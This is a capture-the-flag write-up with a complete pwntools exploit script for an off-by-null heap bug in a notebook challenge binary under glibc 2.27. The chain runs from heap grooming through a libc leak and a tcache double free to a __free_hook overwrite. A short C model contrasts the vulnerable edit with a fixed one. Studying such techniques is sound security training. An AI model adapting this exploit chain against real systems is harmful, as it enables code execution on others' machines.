Exploiting an off-by-null under libc 2.27


The edit function has an off-by-null, and the libc version is 2.27.

Under 2.27 an off-by-null is usually exploited together with unlink, but here a management chunk is sandwiched between the chunks we control.


So first we need some heap feng shui so that the chunks we control end up adjacent to each other.

add('0',0x10,'0')
add('1',0x10,'1')
free(0)

add('0',0x420,'0') # 0
add('2',0x28,'2') # 2
free(1)

add('1',0x4f0,'1') # 1
add('3', 0x10, '3') # 3
free(0)


Now edit chunk 2 to overwrite chunk 1's prev_size, with the off-by-null also writing a single zero byte past the end; then free chunk 1 to trigger unlink and allocate a 0x420 chunk. At this point the fd pointer of management chunk 2 points to a libc address.

edit(2,b'a'*(0x20)+p64(0x4f0))
free(1)
add('0',0x420,'0') # 0

show(2)
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 -0x10 -libc.sym['__malloc_hook']
success('libc_base =========================>'+hex(libc_base))
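As an added illustration that is not part of the original writeup (the binary's edit() source is not shown on the page), the C below models the single byte that the edit(2, ...) payload above writes past chunk 2, contrasting an assumed vulnerable edit with a fixed one; the struct layout, both edit functions and the payload handling are constructed assumptions, not the challenge's code:

```c
#include <stdint.h>
#include <string.h>

/* Constructed model of the layout the writeup relies on: chunk 2 has 0x28
 * usable bytes, the last 8 overlap chunk 1's prev_size, and chunk 1's size
 * field (0x501, PREV_INUSE set) follows. No real glibc chunks are involved;
 * the struct only reproduces the field offsets. */
struct layout {
    uint8_t  chunk2_body[0x20];  /* chunk 2's own data bytes */
    uint64_t chunk1_prev_size;   /* shared with the tail of chunk 2's data */
    uint64_t chunk1_size;        /* 0x501: size 0x500, low bit = PREV_INUSE */
};

/* Assumed shape of the bug: copy up to `size` bytes, then terminate at buf[n].
 * With a full-length input n == size, so the NUL lands one byte past the
 * allocation, i.e. in the low byte of the next chunk's size field. */
static void edit_vulnerable(uint8_t *buf, size_t size,
                            const uint8_t *src, size_t srclen) {
    size_t n = srclen < size ? srclen : size;
    memcpy(buf, src, n);
    buf[n] = '\0';
}

/* Fixed edit: the terminator is reserved inside the allocation, so at most
 * size - 1 bytes are copied and buf[size - 1] is the furthest write. */
static void edit_fixed(uint8_t *buf, size_t size,
                       const uint8_t *src, size_t srclen) {
    if (size == 0) return;
    size_t n = srclen < size - 1 ? srclen : size - 1;
    memcpy(buf, src, n);
    buf[n] = '\0';
}

/* Apply the writeup's payload 'a' * 0x20 + p64(0x4f0) to a fresh layout via
 * either edit and return chunk 1's size field afterwards. */
uint64_t chunk1_size_after_edit(int use_fixed) {
    struct layout l;
    memset(&l, 0, sizeof l);
    l.chunk1_size = 0x501;
    uint8_t payload[0x28];
    memset(payload, 'a', 0x20);
    uint64_t fake_prev_size = 0x4f0;             /* p64(0x4f0), x86-64 */
    memcpy(payload + 0x20, &fake_prev_size, 8);
    uint8_t *chunk2_user = (uint8_t *)&l;        /* the 0x28 usable bytes */
    if (use_fixed)
        edit_fixed(chunk2_user, 0x28, payload, sizeof payload);
    else
        edit_vulnerable(chunk2_user, 0x28, payload, sizeof payload);
    return l.chunk1_size;   /* 0x500 (PREV_INUSE cleared) vs 0x501 intact */
}
```

The vulnerable path clears PREV_INUSE on chunk 1, which is what lets the later free(1) consolidate backwards; the fixed path leaves the size field untouched even though prev_size is still caller-controlled.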

Next, allocate another 0x28 chunk, which is chunk 2 again, but this time under index 1, so indices 1 and 2 now point to the same address; freeing each of them gives a double free.

add('1',0x28,'1') # 1
free(2)
free(1)


add('1',0x28,p64(libc_base + libc.sym['__free_hook'])) # 1
add('2',0x28,'2') # 2
add('4',0x28,p64(one[1]+libc_base)) # 4

free(3)

Overwriting free_hook is then enough.

exp

# -*- coding: utf-8 -*-
from pwn import *
context(os = 'linux', arch = 'amd64', log_level = 'debug')
#io = remote('node4.buuoj.cn',25939)
io = process('./2018_.bin')
elf = ELF('./2018_.bin')
libc = elf.libc
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]  # one_gadget offsets for this libc

# menu wrappers for the notebook binary
def add(name,size,content):
    io.sendlineafter(b'>',b'1')
    io.sendlineafter(b'please enter the name of the notebook:',name)
    io.sendlineafter(b'please enter the length of the content:',str(size).encode())
    io.sendlineafter(b'please enter the content:',content)

def edit(index,content):
    io.sendlineafter(b'>',b'2')
    io.sendlineafter(b'please enter the notebook id to edit:',str(index))
    io.sendlineafter(b'please enter the content of the notebook:',content)

def show(index):
    io.sendlineafter(b'>',b'3')
    io.sendlineafter(b'please enter the notebook id to show:',str(index))

def free(index):
    io.sendlineafter(b'>',b'4')
    io.sendlineafter(b'please enter the notebook id to delete:',str(index))


# heap feng shui: make the chunks we control adjacent
add('0',0x10,'0')
add('1',0x10,'1')
free(0)

add('0',0x420,'0') # 0
add('2',0x28,'2') # 2
free(1)

add('1',0x4f0,'1') # 1
add('3', 0x10, '3') # 3
free(0)


# off-by-null: set chunk 1's prev_size and clear the low byte of its size, then unlink
edit(2,b'a'*(0x20)+p64(0x4f0))
free(1)
add('0',0x420,'0') # 0

# chunk 2 now holds an unsorted-bin pointer: leak libc
show(2)
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 -0x10 -libc.sym['__malloc_hook']
success('libc_base =========================>'+hex(libc_base))

# indices 1 and 2 alias the same 0x28 chunk: tcache double free
add('1',0x28,'1') # 1
free(2)
free(1)

# point the tcache entry at __free_hook and write the one_gadget there
add('1',0x28,p64(libc_base + libc.sym['__free_hook'])) # 1
add('2',0x28,'2') # 2
add('4',0x28,p64(one[1]+libc_base)) # 4

free(3)



io.interactive()
